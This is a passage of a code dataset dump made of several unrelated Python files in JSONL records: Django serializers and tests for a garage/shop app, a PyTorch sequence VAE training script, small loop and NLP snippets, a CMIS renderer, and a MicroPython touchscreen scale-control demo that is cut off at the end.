print(topo.nodes['controller'])\n topo.stop()\n\n\ndef test_pings_perf(topology):\n results = topology.ping()\n topology.validate_ping_results(results)\n","sub_path":"test/perf/test_ping.py","file_name":"test_ping.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"67938591","text":"from rest_framework import serializers\nfrom garageApp.models import Garage, Owner_Detail, Garage_Detail, Garage_Service\nfrom dateutil import parser\n\n\ndef dataTypeConverter(val, type):\n \"\"\"\n convert val into type which can be ('INT', 'CHAR', 'DEC', 'BOOLEAN', 'DATETIME', 'LONG') datatype\n \"\"\"\n if type == \"INT\":\n return int(val)\n elif type == \"CHAR\":\n return str(val)\n elif type == \"DEC\":\n return float(val)\n elif type == \"BOOLEAN\":\n if val == None:\n return False\n val = str(val).lower()\n if val[0] == 'o' or val[0] == 't' or val[0] == 'y':\n return True\n else:\n return False\n elif type == \"DATETIME\":\n return parser.parse(val)\n elif type == \"LONG\":\n return long(val)\n\n\nclass GarageSerializer(serializers.ModelSerializer):\n class Meta:\n model = Garage\n fields = (\n 'Garage_ID', 'Garage_Name', 'Address', 'Suburb', 'City', 'State', 'Year_Establishment', 'Latitude', 'Longitude',\n 'Garage_Type', 'Make', 'Area_Garage', 'Region_ID')\n\n def create(self, validated_data):\n \"\"\"\n Create and return a new `Garage` instance, given the validated data.\n \"\"\"\n return Garage.objects.create(**validated_data)\n\n def make_validations(self, instance, data):\n \"\"\"\n return validated_data from data for `Garage` instance\n \"\"\"\n data['Garage_ID'] = data.get('Garage_ID', instance.Garage_ID)\n data['Garage_Name'] = data.get('Garage_Name', instance.Garage_Name)\n data['Address'] = data.get('Address', instance.Address)\n data['Suburb'] = data.get('Suburb', instance.Suburb)\n data['City'] = data.get('City', instance.City)\n data['State'] = data.get('State', instance.State)\n data['Year_Establishment'] = data.get('Year_Establishment', instance.Year_Establishment)\n data['Latitude'] = data.get('Latitude', instance.Latitude)\n data['Longitude'] = data.get('Longitude', instance.Longitude)\n data['Garage_Type'] = data.get('Garage_Type', instance.Garage_Type)\n data['Make'] = data.get('Make', instance.Make)\n data['Area_Garage'] = data.get('Area_Garage', instance.Area_Garage)\n data['Region_ID'] = data.get('Region_ID', instance.Region_ID)\n return data\n\n def getFormData(self, request):\n \"\"\"\n Return Form Data from POST Request\n \"\"\"\n data = {}\n datatype = {}\n datatype['Garage_ID'] = \"INT\"\n datatype['Garage_Name'] = \"CHAR\"\n datatype['Address'] = \"CHAR\"\n datatype['Suburb'] = \"CHAR\"\n datatype['City'] = \"CHAR\"\n datatype['State'] = \"CHAR\"\n datatype['Year_Establishment'] = \"DATETIME\"\n datatype['Latitude'] = \"DEC\"\n datatype['Longitude'] = \"DEC\"\n datatype['Garage_Type'] = \"CHAR\"\n datatype['Make'] = \"CHAR\"\n datatype['Area_Garage'] = \"DEC\"\n datatype['Region_ID'] = \"INT\"\n for field in self.fields.keys():\n data[field] = request.POST.get(field, None)\n if data[field] != None:\n data[field] = dataTypeConverter(data[field], datatype[field])\n return data\n\n def getRelatedAttributes(self):\n related_attributes = ['Region_ID']\n return related_attributes\n\n def update(self, instance, validated_data):\n \"\"\"\n Update and return an existing `Garage` instance, given the validated data.\n \"\"\"\n instance.Garage_ID = validated_data.get('Garage_ID', instance.Garage_ID)\n instance.Garage_Name = validated_data.get('Garage_Name', instance.Garage_Name)\n instance.Address = validated_data.get('Address', instance.Address)\n instance.Suburb = validated_data.get('Suburb', instance.Suburb)\n instance.City = validated_data.get('City', instance.City)\n instance.State = validated_data.get('State', instance.State)\n instance.Year_Establishment = validated_data.get('Year_Establishment', instance.Year_Establishment)\n instance.Latitude = validated_data.get('Latitude', instance.Latitude)\n instance.Longitude = validated_data.get('Longitude', instance.Longitude)\n instance.Garage_Type = validated_data.get('Garage_Type', instance.Garage_Type)\n instance.Make = validated_data.get('Make', instance.Make)\n instance.Area_Garage = validated_data.get('Area_Garage', instance.Area_Garage)\n instance.Region_ID = validated_data.get('Region_ID', instance.Region_ID)\n instance.save()\n return instance\n\n\nclass Owner_DetailSerializer(serializers.ModelSerializer):\n class Meta:\n model = Owner_Detail\n fields = ('Owner_ID', 'Owner_Name', 'Owner_Number', 'POC', 'Address')\n\n def create(self, validated_data):\n \"\"\"\n Create and return a new `Owner_Detail` instance, given the validated data.\n \"\"\"\n return Owner_Detail.objects.create(**validated_data)\n\n def make_validations(self, instance, data):\n \"\"\"\n return validated_data from data for `Owner_Detail` instance\n \"\"\"\n data['Owner_ID'] = data.get('Owner_ID', instance.Owner_ID)\n data['Owner_Name'] = data.get('Owner_Name', instance.Owner_Name)\n data['Owner_Number'] = data.get('Owner_Number', instance.Owner_Number)\n data['POC'] = data.get('POC', instance.POC)\n data['Address'] = data.get('Address', instance.Address)\n return data\n\n def getFormData(self, request):\n \"\"\"\n Return Form Data from POST Request\n \"\"\"\n data = {}\n datatype = {}\n datatype['Owner_ID'] = \"INT\"\n datatype['Owner_Name'] = \"CHAR\"\n datatype['Owner_Number'] = \"INT\"\n datatype['POC'] = \"CHAR\"\n datatype['Address'] = \"CHAR\"\n for field in self.fields.keys():\n data[field] = request.POST.get(field, None)\n if data[field] != None:\n data[field] = dataTypeConverter(data[field], datatype[field])\n return data\n\n def getRelatedAttributes(self):\n related_attributes = []\n return related_attributes\n\n def update(self, instance, validated_data):\n \"\"\"\n Update and return an existing `Owner_Detail` instance, given the validated data.\n \"\"\"\n instance.Owner_ID = validated_data.get('Owner_ID', instance.Owner_ID)\n instance.Owner_Name = validated_data.get('Owner_Name', instance.Owner_Name)\n instance.Owner_Number = validated_data.get('Owner_Number', instance.Owner_Number)\n instance.POC = validated_data.get('POC', instance.POC)\n instance.Address = validated_data.get('Address', instance.Address)\n instance.save()\n return instance\n\n\nclass Garage_DetailSerializer(serializers.ModelSerializer):\n class Meta:\n model = Garage_Detail\n fields = ('Garage_Detail_ID', 'Equipment_Name', 'Number_Of_Two_Post_Lift', 'Washing_Bay', 'Paint_Booth',\n 'Scanning_Tool_Kit', 'No_Of_Mechanics', 'Working_Staff', 'Service_Capacity', 'Visited_By',\n 'Garage_ID')\n\n def create(self, validated_data):\n \"\"\"\n Create and return a new `Garage_Detail` instance, given the validated data.\n \"\"\"\n return Garage_Detail.objects.create(**validated_data)\n\n def make_validations(self, instance, data):\n \"\"\"\n return validated_data from data for `Garage_Detail` instance\n \"\"\"\n data['Garage_Detail_ID'] = data.get('Garage_Detail_ID', instance.Garage_Detail_ID)\n data['Equipment_Name'] = data.get('Equipment_Name', instance.Equipment_Name)\n data['Number_Of_Two_Post_Lift'] = data.get('Number_Of_Two_Post_Lift', instance.Number_Of_Two_Post_Lift)\n data['Washing_Bay'] = data.get('Washing_Bay', instance.Washing_Bay)\n data['Paint_Booth'] = data.get('Paint_Booth', instance.Paint_Booth)\n data['Scanning_Tool_Kit'] = data.get('Scanning_Tool_Kit', instance.Scanning_Tool_Kit)\n data['No_Of_Mechanics'] = data.get('No_Of_Mechanics', instance.No_Of_Mechanics)\n data['Working_Staff'] = data.get('Working_Staff', instance.Working_Staff)\n data['Service_Capacity'] = data.get('Service_Capacity', instance.Service_Capacity)\n data['Visited_By'] = data.get('Visited_By', instance.Visited_By)\n data['Garage_ID'] = data.get('Garage_ID', instance.Garage_ID)\n return data\n\n def getFormData(self, request):\n \"\"\"\n Return Form Data from POST Request\n \"\"\"\n data = {}\n datatype = {}\n datatype['Garage_Detail_ID'] = \"INT\"\n datatype['Equipment_Name'] = \"CHAR\"\n datatype['Number_Of_Two_Post_Lift'] = \"INT\"\n datatype['Washing_Bay'] = \"CHAR\"\n datatype['Paint_Booth'] = \"CHAR\"\n datatype['Scanning_Tool_Kit'] = \"CHAR\"\n datatype['No_Of_Mechanics'] = \"INT\"\n datatype['Working_Staff'] = \"INT\"\n datatype['Service_Capacity'] = \"INT\"\n datatype['Visited_By'] = \"CHAR\"\n datatype['Garage_ID'] = \"INT\"\n for field in self.fields.keys():\n data[field] = request.POST.get(field, None)\n if data[field] != None:\n data[field] = dataTypeConverter(data[field], datatype[field])\n return data\n\n def getRelatedAttributes(self):\n related_attributes = ['Garage_ID']\n return related_attributes\n\n def update(self, instance, validated_data):\n \"\"\"\n Update and return an existing `Garage_Detail` instance, given the validated data.\n \"\"\"\n instance.Garage_Detail_ID = validated_data.get('Garage_Detail_ID', instance.Garage_Detail_ID)\n instance.Equipment_Name = validated_data.get('Equipment_Name', instance.Equipment_Name)\n instance.Number_Of_Two_Post_Lift = validated_data.get('Number_Of_Two_Post_Lift',\n instance.Number_Of_Two_Post_Lift)\n instance.Washing_Bay = validated_data.get('Washing_Bay', instance.Washing_Bay)\n instance.Paint_Booth = validated_data.get('Paint_Booth', instance.Paint_Booth)\n instance.Scanning_Tool_Kit = validated_data.get('Scanning_Tool_Kit', instance.Scanning_Tool_Kit)\n instance.No_Of_Mechanics = validated_data.get('No_Of_Mechanics', instance.No_Of_Mechanics)\n instance.Working_Staff = validated_data.get('Working_Staff', instance.Working_Staff)\n instance.Service_Capacity = validated_data.get('Service_Capacity', instance.Service_Capacity)\n instance.Visited_By = validated_data.get('Visited_By', instance.Visited_By)\n instance.Garage_ID = validated_data.get('Garage_ID', instance.Garage_ID)\n instance.save()\n return instance\n\n\nclass Garage_ServiceSerializer(serializers.ModelSerializer):\n class Meta:\n model = Garage_Service\n fields = ('Garage_Service_ID', 'Service_ID', 'Garage_ID', 'Cat_ID', 'SubCat_ID', 'SubSubCat_ID')\n\n def create(self, validated_data):\n \"\"\"\n Create and return a new `Garage_Service` instance, given the validated data.\n \"\"\"\n return Garage_Service.objects.create(**validated_data)\n\n def make_validations(self, instance, data):\n \"\"\"\n return validated_data from data for `Garage_Service` instance\n \"\"\"\n data['Garage_Service_ID'] = data.get('Garage_Service_ID', instance.Garage_Service_ID)\n data['Service_ID'] = data.get('Service_ID', instance.Service_ID)\n data['Garage_ID'] = data.get('Garage_ID', instance.Garage_ID)\n data['Cat_ID'] = data.get('Cat_ID', instance.Cat_ID)\n data['SubCat_ID'] = data.get('SubCat_ID', instance.SubCat_ID)\n data['SubSubCat_ID'] = data.get('SubSubCat_ID', instance.SubSubCat_ID)\n return data\n\n def getFormData(self, request):\n \"\"\"\n Return Form Data from POST Request\n \"\"\"\n data = {}\n datatype = {}\n datatype['Garage_Service_ID'] = \"INT\"\n datatype['Service_ID'] = \"INT\"\n datatype['Garage_ID'] = \"INT\"\n datatype['Cat_ID'] = \"INT\"\n datatype['SubCat_ID'] = \"INT\"\n datatype['SubSubCat_ID'] = \"INT\"\n for field in self.fields.keys():\n data[field] = request.POST.get(field, None)\n if data[field] != None:\n data[field] = dataTypeConverter(data[field], datatype[field])\n return data\n\n def getRelatedAttributes(self):\n related_attributes = ['Service_ID', 'Garage_ID', 'Cat_ID', 'SubCat_ID', 'SubSubCat_ID']\n return related_attributes\n\n def update(self, instance, validated_data):\n \"\"\"\n Update and return an existing `Garage_Service` instance, given the validated data.\n \"\"\"\n instance.Garage_Service_ID = validated_data.get('Garage_Service_ID', instance.Garage_Service_ID)\n instance.Service_ID = validated_data.get('Service_ID', instance.Service_ID)\n instance.Garage_ID = validated_data.get('Garage_ID', instance.Garage_ID)\n instance.Cat_ID = validated_data.get('Cat_ID', instance.Cat_ID)\n instance.SubCat_ID = validated_data.get('SubCat_ID', instance.SubCat_ID)\n instance.SubSubCat_ID = validated_data.get('SubSubCat_ID', instance.SubSubCat_ID)\n instance.save()\n return instance\n","sub_path":"carcrew/garageApp/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":13223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"75030035","text":"\n# coding: utf-8\n\n# In[1]:\n\n\n\nfrom sklearn.feature_extraction.text import CountVectorizer\n2\n#from sklearn.feature_extraction.text import TfidfVectorizer\nvect=CountVectorizer(binary=True) #explore other parameters to\ncorpus=[\"Tesseract is good optical character recognition engine\",\"optical character rcognition is different\"]\nvect.fit(corpus)\nprint(vect.transform([\"Today is good optical\"]).toarray())\n#print(vect.transform(corpus).toarray())\n\n","sub_path":"nlp/Count_Vectorizer.py","file_name":"Count_Vectorizer.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"456050703","text":"from django.test import TestCase\nfrom django.urls import reverse\n\nfrom api.serializers.commerce import ProductSerializer\n\nfrom ..factories import ProductFactory, ShopFactory\n\n\nclass WhenUserGetShopProductTrending(TestCase):\n \"\"\"\n [Test if user can get products]\n\n Arguments:\n TestCase {[type]} -- [description]\n \"\"\"\n\n def setUp(self):\n \"\"\"\n [Sets up the testing database]\n \"\"\"\n self.shop = ShopFactory()\n self.product = ProductFactory(shop_rel=self.shop)\n self.response = self.client.get(\n reverse(\n \"api:shop_trending_product\",\n kwargs={\"slug\": self.shop.slug, \"cat\": self.product.genre[\"slug\"]},\n ),\n content_type=\"application/json\",\n )\n\n def test_response_code(self):\n \"\"\"\n [Test if there are no errors]\n \"\"\"\n assert self.response.status_code == 200\n\n def test_products_returned(self):\n \"\"\"\n [Check if the info are returned]\n \"\"\"\n product = ProductSerializer(self.product)\n assert self.response.json()[\"results\"] == [product.data]\n","sub_path":"tests/store/test_user_can_see_shop_trending_product.py","file_name":"test_user_can_see_shop_trending_product.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"55935939","text":"from __future__ import print_function\nimport argparse\nimport torch\nimport torch.utils.data\nimport os\nimport scipy.io as sio\nfrom torch import nn, optim\nfrom torch.autograd import Variable\n#from torch.nn import functional as F\nfrom torchvision import datasets, transforms\nfrom torchvision.utils import save_image\n\n# constants defined at the beginning\nseq_length=201\ninput_dim=1862\nbatch_size=17\nn_samples=37\nisAnnealing=1\n\n\nparser = argparse.ArgumentParser(description='VAE MNIST Example')\nparser.add_argument('--batch-size', type=int, default=128, metavar='N',\n help='input batch size for training (default: 128)')\nparser.add_argument('--epochs', type=int, default=10, metavar='N',\n help='number of epochs to train (default: 10)')\nparser.add_argument('--no-cuda', action='store_true', default=False,\n help='enables CUDA training')\nparser.add_argument('--seed', type=int, default=1, metavar='S',\n help='random seed (default: 1)')\nparser.add_argument('--log-interval', type=int, default=10, metavar='N',\n help='how many batches to wait before logging training status')\nargs = parser.parse_args()\nargs.cuda = not args.no_cuda and torch.cuda.is_available()\n\n\n\ntorch.manual_seed(args.seed)\nif args.cuda:\n torch.cuda.manual_seed(args.seed)\n\n\nkwargs = {'num_workers': 1, 'pin_memory': True} if args.cuda else {}\ntrain_loader = torch.utils.data.DataLoader(\n datasets.MNIST('../data', train=True, download=True,\n transform=transforms.ToTensor()),\n batch_size=args.batch_size, shuffle=True, **kwargs)\ntest_loader = torch.utils.data.DataLoader(\n datasets.MNIST('../data', train=False, transform=transforms.ToTensor()),\n batch_size=args.batch_size, shuffle=True, **kwargs)\n\n#To import data\nos.chdir(\"../DataSingle/\")\npath_data=os.getcwd()\nos.chdir(\"../VAE_Pytorch/\")\n#data import portion ends\n\nclass VAE(nn.Module):\n def __init__(self):\n super(VAE, self).__init__()\n\n self.fc1 = nn.LSTM(input_dim, 800)\n self.fc21 = nn.Linear(800, 50)\n self.fc22 = nn.Linear(800, 50)\n self.fc3 = nn.Linear(50, 800)\n self.fc41 = nn.LSTM(800, input_dim)\n self.fc42 = nn.LSTM(800, input_dim)\n self.relu = nn.ReLU()\n self.sigmoid = nn.Sigmoid()\n\n\n def encode(self, x):\n out, hidden=self.fc1(x)\n h1 = self.relu(out)\n return self.fc21(h1), self.fc22(h1)\n\n def reparameterize(self, mu, logvar):\n if self.training:\n std = logvar.mul(0.5).exp_()\n eps = Variable(std.data.new(std.size()).normal_())\n return eps.mul(std).add_(mu)\n else:\n return mu\n\n def decode(self, z):\n h3 = self.relu(self.fc3(z))\n out1,hidden1=self.fc41(h3)\n out2, hidden2 = self.fc42(h3)\n return self.sigmoid(out1), (out2)\n\n def forward(self, x):\n mu, logvar = self.encode(x)\n z = self.reparameterize(mu, logvar)\n muTheta,logvarTheta=self.decode(z)\n return muTheta,logvarTheta, mu, logvar\n\n\nmodel = VAE()\nif args.cuda:\n model.cuda()\n\n\ndef loss_function(muTheta,logvarTheta, x, mu, logvar,annealParam):\n #tol=1e-8\n #BCE = -torch.sum(torch.mul(x,torch.log(tol+recon_x))+(1-x).mul(torch.log(1+tol-recon_x)))\n diffSq=(x-muTheta).pow(2)\n precis=torch.exp(-logvarTheta)\n #print('Sum logvar:',torch.sum(logvarTheta))\n #print('Sumerror: ',torch.sum(diffSq))\n #print('SumerrordivVar: ', torch.sum(torch.mul(diffSq,precis)))\n BCE=0.5*torch.sum(logvarTheta+torch.mul(diffSq,precis))\n BCE/=(batch_size * input_dim*seq_length)\n\n # see Appendix B from VAE paper:\n # Kingma and Welling. Auto-Encoding Variational Bayes. ICLR, 2014\n # https://arxiv.org/abs/1312.6114\n # 0.5 * sum(1 + log(sigma^2) - mu^2 - sigma^2)\n KLD = -0.5 * annealParam*torch.sum(1 + logvar - mu.pow(2) - logvar.exp())\n # Normalise by same number of elements as in reconstruction\n KLD /= batch_size * 50*seq_length\n\n return BCE + KLD\n\n\noptimizer = optim.Adam(model.parameters(), lr=1e-3)\n\ndef prepareData(train_loader, seq_length, batch_index):\n index_start=batch_index*seq_length\n index_end=index_start+seq_length\n for i, (data, _) in enumerate(train_loader):\n data=data.view(-1,input_dim)\n data=data.resize_((batch_size,input_dim,1))\n if i==index_start:\n outData=data\n elif i > index_start and i < index_end:\n outData=torch.cat((outData,data),2)\n return outData.permute(2,0,1)\ndef train(epoch):\n model.train()\n train_loss = 0\n seg_range = list(range(0, 17))\n j = 1\n while j < input_dim:\n # Loop over all segments\n for i in seg_range:\n # batch_xs, _ = mnist.train.next_batch(batch_size)\n\n # print (i,',',j)\n TrainData = sio.loadmat(path_data + '/TmpSeg' + str(i) + 'exc' + str(j) + '.mat')\n\n zz = torch.FloatTensor(TrainData['U'])\n U=zz.contiguous().view(seq_length, 1, -1)\n #print(U)\n if i == 0:\n outData = U\n elif i > 0 and i < 17:\n outData = torch.cat((outData, U), 1)\n\n data = Variable(outData) #sequence length, batch size, input size\n #print(data.size())\n if args.cuda:\n data = data.cuda()\n optimizer.zero_grad()\n muTheta,logvarTheta, mu, logvar = model(data)\n if epoch<50:\n annealParam=0\n elif epoch <500:\n annealParam=(epoch/500)\n else:\n annealParam=1\n loss = loss_function(muTheta,logvarTheta, data, mu, logvar,annealParam)\n loss.backward()\n train_loss += loss.data[0]\n optimizer.step()\n\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n epoch, j, 50*n_samples,\n 100. * j / (50*n_samples),\n loss.data[0] ))\n j=j+50\n\n print('====> Epoch: {} Average loss: {:.4f}'.format(\n epoch, train_loss / n_samples))\n\n\ndef test(epoch):\n model.eval()\n test_loss = 0\n for i, (data, _) in enumerate(test_loader):\n if args.cuda:\n data = data.cuda()\n data = Variable(data, volatile=True)\n recon_batch, mu, logvar = model(data)\n test_loss += loss_function(recon_batch, data, mu, logvar).data[0]\n if i == 0:\n n = min(data.size(0), 8)\n comparison = torch.cat([data[:n],\n recon_batch.view(args.batch_size, 1, 28, 28)[:n]])\n save_image(comparison.data.cpu(),\n 'results/reconstruction_' + str(epoch) + '.png', nrow=n)\n\n test_loss /= len(test_loader.dataset)\n print('====> Test set loss: {:.4f}'.format(test_loss))\n\ndef save_checkpoint(state, filename='checkpoint.pth.tar'):\n torch.save(state, filename)\n\nfor epoch in range(1, args.epochs + 1):\n train(epoch)\n if (epoch % 100==0):\n save_checkpoint({\n 'epoch': epoch ,\n 'state_dict': model.state_dict(),\n 'optimizer': optimizer.state_dict(),\n }, 'output/modelGaussAn' + str(epoch))\n '''\n test(epoch)\n sample = Variable(torch.randn(64, 20))\n if args.cuda:\n sample = sample.cuda()\n sample = model.decode(sample).cpu()\n save_image(sample.data.view(64, 1, 28, 28),\n 'results/sample_' + str(epoch) + '.png')\n '''\n","sub_path":"SeqVaeAligned.py","file_name":"SeqVaeAligned.py","file_ext":"py","file_size_in_byte":7380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"613763607","text":"#!/usr/bin/env python\n\n\"\"\"\n*****************************************************************\nLicensed Materials - Property of IBM\n(C) Copyright IBM Corp. 2020. All Rights Reserved.\nUS Government Users Restricted Rights - Use, duplication or\ndisclosure restricted by GSA ADP Schedule Contract with IBM Corp.\n*****************************************************************\n\n*******************************************************************************\nScript: validate_env.py\n\nSummary:\n Performs syntactic validation on environment files used by build_env.py from\n the open-ce project.\n\nDescription:\n This script will take a YAML build env file and will check that file and all\n dependencies for syntactic errors.\n\n*******************************************************************************\n\"\"\"\n\nimport sys\nimport env_config\nimport utils\n\ndef make_parser():\n ''' Parser for input arguments '''\n arguments = [utils.Argument.ENV_FILE, utils.Argument.PYTHON_VERSIONS,\n utils.Argument.BUILD_TYPES]\n parser = utils.make_parser(arguments,\n description = 'Lint Environment Files')\n return parser\n\ndef validate_env(arg_strings=None):\n '''\n Entry function.\n '''\n parser = make_parser()\n args = parser.parse_args(arg_strings)\n variants = [{ 'python' : py_vers, 'build_type' : build_type } for py_vers in utils.parse_arg_list(args.python_versions)\n for build_type in utils.parse_arg_list(args.build_types)]\n retval = 0\n for variant in variants:\n result,_ = env_config.load_env_config_files(args.env_config_file, variant)\n retval += result\n\n return retval\n\nif __name__ == '__main__':\n sys.exit(validate_env())\n","sub_path":"open-ce/validate_env.py","file_name":"validate_env.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"121694578","text":"# Continue Method\r\n\r\nstring = 'Python'\r\n\r\nx = 0\r\nwhile x < len(string):\r\n if string[x] == \"y\":\r\n x = x + 1\r\n continue\r\n else:\r\n print(string[x])\r\n x += 1\r\n\r\n# Break Method\r\n\r\nliste = ['Ship','Vehicle','Train','Plane']\r\n\r\nx = 0\r\nwhile True:\r\n if liste[x] == 'Vehicle':\r\n x += 1\r\n continue\r\n elif x == len(liste)-1:\r\n break\r\n else:\r\n print(liste[x])\r\n x += 1\r\n\r\n# Selection Making\r\n\r\nquest = int(input(\"Selection #1\\nSelection #2\\nYour choice: \"))\r\n\r\nwhile True:\r\n if quest == 1:\r\n print(\"Selection number 1 has choosen.\")\r\n break\r\n elif quest == 2:\r\n print(\"Selection number 2 has choosen.\")\r\n break\r\n else:\r\n print(\"Did the wrong choice.\")\r\n break","sub_path":"src/Loops/BreakContinue.py","file_name":"BreakContinue.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"189655819","text":"from flask import render_template\n\n# TEMP\nROOT = \"http://localhost:5000/cmis/atompub\"\nXML_HEADER = \"\\n\"\n\n\nclass Feed(object):\n def __init__(self, object, collection):\n self.object = object\n self.collection = collection\n\n def to_xml(self, **options):\n ctx = {'ROOT': ROOT, 'object': self.object,\n 'collection': self.collection, 'to_xml': to_xml}\n return render_template(\"cmis/feed.xml\", **ctx)\n\n\nclass Entry(object):\n def __init__(self, obj):\n self.obj = obj\n\n def to_xml(self, **options):\n ctx = {'ROOT': ROOT, 'folder': self.obj, 'document': self.obj,\n 'options': options, 'to_xml': to_xml}\n\n if self.obj.sbe_type == 'cmis:folder':\n result = render_template(\"cmis/folder.xml\", **ctx)\n elif self.obj.sbe_type == 'cmis:document':\n result = render_template(\"cmis/document.xml\", **ctx)\n else:\n raise Exception(\"Unknown base object type: %s\" % self.obj.sbe_type)\n\n if not 'no_xml_header' in options:\n result = XML_HEADER + result\n\n return result\n\n\ndef to_xml(obj, **options):\n entry = Entry(obj)\n return entry.to_xml(**options)\n","sub_path":"abilian/sbe/apps/documents/cmis/renderer.py","file_name":"renderer.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"607959451","text":"# scale_ctrl_test.py Test/demo of ScaleCtrl widget for Pybboard RA8875 GUI\n\n# Released under the MIT License (MIT). See LICENSE.\n# Copyright (c) 2021 Peter Hinch\n\n# Usage:\n# import micropython_ra8875.demos.scale_ctrl_test\n\nimport uasyncio as asyncio\nfrom micropython_ra8875.py.colors import *\nfrom micropython_ra8875.py.ugui import Screen\nfrom micropython_ra8875.fonts import font10, font14\nfrom micropython_ra8875.widgets.buttons import Button\nfrom micropython_ra8875.widgets.label import Label\nfrom micropython_ra8875.widgets.scale_ctrl import ScaleCtrl\nfrom micropython_ra8875.widgets.scale_log import ScaleLog\nfrom micropython_ra8875.driver.tft_local import setup # Local wiring\n\n# Arguments common to sets of controls\nbuttons = {'font': font14,\n 'width': 80,\n 'height': 30,\n 'shape': RECTANGLE,\n 'fontcolor': BLACK, }\n\nlabels = {'font': font14,\n 'width': 140,\n 'border': 2,\n 'fontcolor': WHITE,\n 'bgcolor': DARKGREEN,\n 'fgcolor': RED, }\n\nscales = {'font': font10,\n 'width': 350,\n 'height': 60,\n 'pointercolor': RED,\n 'fontcolor': YELLOW,\n 'fgcolor': GREEN,\n 'bgcolor': BLACK, }\n\n# STANDARD BUTTONS\n\ndef quitbutton(x, y):\n def quit(button):\n Screen.shutdown()\n Button((x, y), callback = quit, fgcolor = RED, text = 'Quit', **buttons)\n\ndef fwdbutton(x, y, cls_screen, text='Next'):\n def fwd(button):\n Screen.change(cls_screen)\n Button((x, y), callback = fwd, fgcolor = GREEN, text = text, **buttons)\n\ndef backbutton(x, y):\n def back(button):\n Screen.back()\n Button((x, y), callback = back, fgcolor = CYAN, text = 'Back', **buttons)\n\nclass linearScreen(Screen):\n def __init__(self):\n super().__init__()\n\n # Scale 0 with custom variable and legends.\n Label((0, 0), font = font14, value = 'FM radio scale 88-108MHz.')\n lbl_result0 = Label((0, 240), **labels)\n # Define callbacks for scale 0\n def legendcb(f):\n return '{:2.0f}'.format(88 + ((f + 1) / 2) * (108 - 88))\n\n def scale_move0(scale):\n sv = scale.value()\n sv = (sv + 1) / 2 # 0 <= sv <= 1\n lbl_result0.value('{:6.2f}'.format(sv*(108 - 88) + 88))\n\n self.scale0 = ScaleCtrl((0, 30), legendcb = legendcb,\n cb_move=scale_move0, **scales)\n # Scale 1 with varying color.\n Label((0, 130), font = font14, value = 'Default scale -1 to +1, varying colors.')\n lbl_result1 = Label((200, 240), **labels)\n # Define callbacks for scale 1\n def tickcb(f, c):\n if f > 0.8:\n return RED\n if f < -0.8:\n return BLUE\n return c\n\n def scale_move1(scale):\n sv = scale.value()\n lbl_result1.value('{:4.3f}'.format(sv))\n\n self.scale1 = ScaleCtrl((0, 160), tickcb = tickcb,\n cb_move=scale_move1, **scales)\n # Define buttons\n x = 390\n y = 242\n backbutton(x, y)\n #Button((x, y), fgcolor = RED, text = 'Quit',\n #callback = lambda _: Screen.shutdown(), **buttons)\n y -= 50\n Button((x, y), fgcolor = GREEN, text = 'Enable',\n callback = self.en, **buttons)\n y -= 50\n Button((x, y), fgcolor = YELLOW, text = 'Disable',\n callback = self.dis, **buttons)\n y -= 50\n Button((x, y), fgcolor = BLUE, text = 'Zero',\n callback = lambda _: self.scale1.value(0), **buttons)\n\n\n def en(self, _): # Discard button arg\n self.scale0.greyed_out(False)\n self.scale1.greyed_out(False)\n\n def dis(self, _):\n self.scale0.greyed_out(True)\n self.scale1.greyed_out(True)\n\nclass LogScreen(Screen):\n def __init__(self):\n super().__init__()\n\n # Scale 0\n Label((0, 0), font = font14, value = 'Default scale 5 decades.')\n lbl_result0 = Label((0, 240), **labels)\n # Define callbacks for scale 0\n def legendcb(f):\n if f < 999:\n return '{:<1.0f}'.format(f)\n return '{:<1.0f}K'.format(f/1000)\n\n def scale_move0(scale):\n sv = scale.value()\n lbl_result0.value('{:6.2f}'.format(sv))\n self.scale1.value(scale.value()) # Cause lower scale to mimic this one\n\n self.scale0 = ScaleLog((0, 30), legendcb = legendcb, value=15,\n cb_move=scale_move0, **scales)\n # Scale 1 with varying color.\n Label((0, 130), font = font14, value = 'Varying colors, follows top scale.')\n lbl_result1 = Label((200, 240), **labels)\n # Define callbacks for scale 1\n def tickcb(f, c):\n if f > 30000:\n return RED\n if f < 10:\n return BLUE\n return c\n\n def scale_move1(scale):\n sv = scale.value()\n lbl_result1.value('{:6.2f}'.format(sv))\n\n self.scale1 = ScaleLog((0, 160), tickcb = tickcb,\n cb_move=scale_move1, **scales)\n # Define buttons\n x = 390\n y = 242\n backbutton(x, y)\n y -= 50\n Button((x, y), fgcolor = GREEN, text = 'Enable',\n callback = self.en, **buttons)\n y -= 50\n Button((x, y), fgcolor = YELLOW, text = 'Disable',\n callback = self.dis, **buttons)\n y -= 50\n Button((x, y), fgcolor = BLUE, text = 'Reset',\n callback = lambda _: self.scale1.value(1), **buttons)\n\n\n def en(self, _): # Discard button arg\n self.scale0.greyed_out(False)\n self.scale1.greyed_out(False)\n\n def dis(self, _):\n self.scale0.greyed_out(True)\n self.scale1.greyed_out(True)\n\nclass ChoiceScreen(Screen):\n def __init__(self):\n super().__init__()\n Label((0, 0), font = font14, value = 'Demo of linear and log scale controls.')\n fwdbutton(10, 50, linearScreen, 'Linear')\n fwdbutton(10, 100, LogScreen, 'Log')\n quitbutton(200, 242)\n \ndef test():\n setup()\n 